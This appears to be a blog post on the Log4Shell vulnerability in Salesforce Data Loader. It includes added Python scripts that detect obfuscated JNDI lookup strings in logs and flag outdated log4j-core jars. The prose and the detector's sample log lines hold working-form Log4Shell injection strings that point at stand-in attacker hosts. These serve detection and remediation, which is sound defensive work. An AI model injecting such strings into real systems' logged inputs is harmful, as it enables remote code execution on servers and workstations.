Salesforce Data Loader Log4j Vulnerability

Log4j, Apache's widely used Java logging library, was found to contain a critical security vulnerability. It is tracked officially as CVE-2021-44228 and known informally as Log4Shell (some early reports also called it LogJam, a name better reserved for the unrelated 2015 TLS weakness). Log4Shell is a Remote Code Execution (RCE) vulnerability: when a vulnerable Log4j 2.x version logs a string containing a lookup such as ${jndi:ldap://attacker-host/x}, the library resolves the lookup, connects to the attacker's server and can load and run the Java class it returns. An attacker therefore needs nothing more than to get one crafted string into something the application logs (a User-Agent header, a username, a form field), and exploitation requires little skill. The attacker's code then runs with the privileges of the Java process, which on many servers amounts to full control of the machine.
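As an added example (not part of the original post, and not Salesforce code), the following Python detector shows what that "single string in the log" looks like and how to find it in logs you already have. It first collapses the nesting tricks attackers used to hide the literal jndi keyword (lower/upper lookups, empty lookups with a :- default, unknown variables with a default) and only then matches, and it deliberately keeps a lookup whose prefix is already jndi even when a :- default is attached, because Log4j would still attempt the JNDI lookup. The log lines and the host attacker.example are constructed for the demonstration.

```python
import re

# Innermost ${...} expression: one that contains no further "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup: ${jndi:<scheme>:...}, e.g. ${jndi:ldap://host/x}.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed Apache-style access log lines (the User-Agent field is what gets logged).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://attacker.example/d}"',
    'INFO  Started export job at ${date:yyyy-MM-dd}',
    '10.0.0.9 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "-" "${JNDI:LDAP://attacker.example/e}"',
]


def _resolve_one(body: str):
    """Evaluate one lookup body the way a detector should.

    ${lower:J} -> "j", ${upper:j} -> "J", ${::-j} -> "j", ${env:NOPE:-j} -> "j".
    A jndi lookup is returned as None (kept verbatim) even if it carries a
    ":-" default, because Log4j would try the JNDI lookup before the default.
    Any other lookup without a default is also kept verbatim.
    """
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
    prefix, _, key = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return None
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if default is not None:
        return default
    return None


def normalize(s: str) -> str:
    """Repeatedly collapse innermost lookups until nothing more resolves.

    Every substitution removes one "${" and never introduces another, so this terminates.
    """
    while True:
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        s = INNER_LOOKUP.sub(repl, s)
        if not changed:
            return s


def scan(lines):
    """Return (index, scheme, normalized_line) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits


if __name__ == "__main__":
    for index, scheme, norm in scan(SAMPLE_LOGS):
        print(f"line {index}: jndi via {scheme}: {norm}")
```

Run it over a real access or application log by replacing SAMPLE_LOGS with the file's lines; the scheme it reports (ldap, rmi, dns, ...) tells you whether the string was a probe (dns callbacks were common for scanning) or a full exploitation attempt.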

Severity of Log4Shell

The Common Vulnerability Scoring System (CVSS) rates software vulnerabilities according to characteristics such as attack vector, attack complexity, privileges required, user interaction and impact. The base score ranges from 0.0 to 10.0, with 9.0 and above classed as Critical. CVSS is maintained by FIRST, which publishes the full specification.

As a point of comparison for the severity of Log4Shell: the SolarWinds breach cost that company approximately $18 million in the first few months of 2021, and the vulnerability behind it was rated 9 on the CVSS scale. (CVSS scores the vulnerability itself, not the cost of the incident that exploited it.)

Log4Shell received the maximum score of 10.0: it is exploitable over the network, needs no privileges and no user interaction, and gives a complete loss of confidentiality, integrity and availability.

Data Loader and Log4Shell

Data Loader is a client application for exporting, importing, updating, upserting or deleting Salesforce records in bulk. Many users with the appropriate permissions run it daily. Data Loader is a Java application that bundles Apache Log4j, so a vulnerable Log4j version shipped inside the installer makes the Data Loader installation itself vulnerable to Log4Shell. Because Data Loader runs on the user's own machine, the vulnerable code sits on every workstation where it is installed, not in the Salesforce org.

Data Loader versions 53.0.1 and below that were downloaded and installed before December 20, 2021 may be affected by the Apache Log4j vulnerabilities. Salesforce addressed this by releasing an updated Data Loader, version 53.0.2, which is now available in Setup. Users can download and install it from Setup.
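To confirm which Log4j a given Data Loader installation actually carries, rather than relying on the Data Loader version number alone, the following added example (not part of the original post, not Salesforce code) walks an install directory, finds every log4j-core jar, reads its version from the Maven pom.properties inside the jar (falling back to the file name, so a renamed jar is still identified) and checks whether JndiLookup.class is still present. The directory layout it builds under dataloader/lib is a constructed stand-in, not the real Data Loader tree, and the 2.17.1 floor is an assumption: 2.15.0 fixed CVE-2021-44228, but 2.16.0, 2.17.0 and 2.17.1 fixed follow-on Log4j CVEs, so anything older is reported as outdated.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Where Maven-built log4j-core jars record their version (survives a renamed jar).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class behind ${jndi:...}; deleting it from the jar was the official stop-gap mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$", re.IGNORECASE)
# Assumed floor (see lead-in): older releases are reported as outdated.
MINIMUM_SAFE = (2, 17, 1)


def _version_of(zf: zipfile.ZipFile, path: Path):
    """Version from pom.properties if present, else from the file name; None if not log4j-core."""
    if POM_PROPS in zf.namelist():
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", props, re.MULTILINE)
        if m:
            return tuple(int(x) for x in m.groups())
    m = JAR_NAME.match(path.name)
    return tuple(int(x) for x in m.groups()) if m else None


def assess_jar(path: Path):
    """Return (version, jndi_lookup_present, verdict), or None when the jar is not log4j-core."""
    try:
        with zipfile.ZipFile(path) as zf:
            version = _version_of(zf, path)
            if version is None:
                return None
            has_jndi = JNDI_LOOKUP_CLASS in zf.namelist()
    except zipfile.BadZipFile:
        return None
    if version >= MINIMUM_SAFE:
        verdict = "ok"                      # JndiLookup still ships but is disabled/restricted
    elif has_jndi:
        verdict = "vulnerable"
    else:
        verdict = "mitigated-but-outdated"  # class stripped by hand; still upgrade
    return version, has_jndi, verdict


def scan_install(root) -> dict:
    """Map each log4j-core jar under root (relative POSIX path) to its assessment."""
    root = Path(root)
    results = {}
    for jar in root.rglob("*.jar"):
        if not jar.is_file():
            continue
        r = assess_jar(jar)
        if r is not None:
            results[jar.relative_to(root).as_posix()] = r
    return results


def build_fixture(root) -> None:
    """Constructed stand-in for a Data Loader install tree (not real Salesforce artifacts)."""
    root = Path(root)

    def jar(rel, version=None, with_jndi=True):
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        with zipfile.ZipFile(p, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            if version:
                zf.writestr(POM_PROPS, f"version={version}\n")
                if with_jndi:
                    zf.writestr(JNDI_LOOKUP_CLASS, b"")

    jar("dataloader/lib/log4j-core-2.14.1.jar", "2.14.1")                 # as shipped: vulnerable
    jar("dataloader/lib/patched/log4j-core-2.14.1.jar", "2.14.1", False)  # JndiLookup.class removed
    jar("dataloader/lib/renamed.jar", "2.17.1")                           # version only in pom.properties
    jar("dataloader/lib/commons-io-2.8.0.jar")                            # unrelated jar, ignored


def demo() -> dict:
    """Build the fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_install(tmp)


if __name__ == "__main__":
    for rel, (version, has_jndi, verdict) in sorted(demo().items()):
        print(f"{rel}: {'.'.join(map(str, version))} JndiLookup={has_jndi} -> {verdict}")
```

Point scan_install at the real installation directory on a workstation to get the same report for the jars actually present; a result of "mitigated-but-outdated" means someone removed JndiLookup.class by hand, which blocked CVE-2021-44228 but is no substitute for installing the updated release.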

Data Loader 53.0.2 Direct Download link (Win/Mac):

Even if your org has not been affected by this vulnerability, instruct every Data Loader user to download and install the new version. Data Loader is installed per workstation, so the update is not applied centrally: confirm afterwards that no older copy remains on any machine.

Keep your orgs safe!

Data Loader V53.0.2 - Log4j Vulnerability
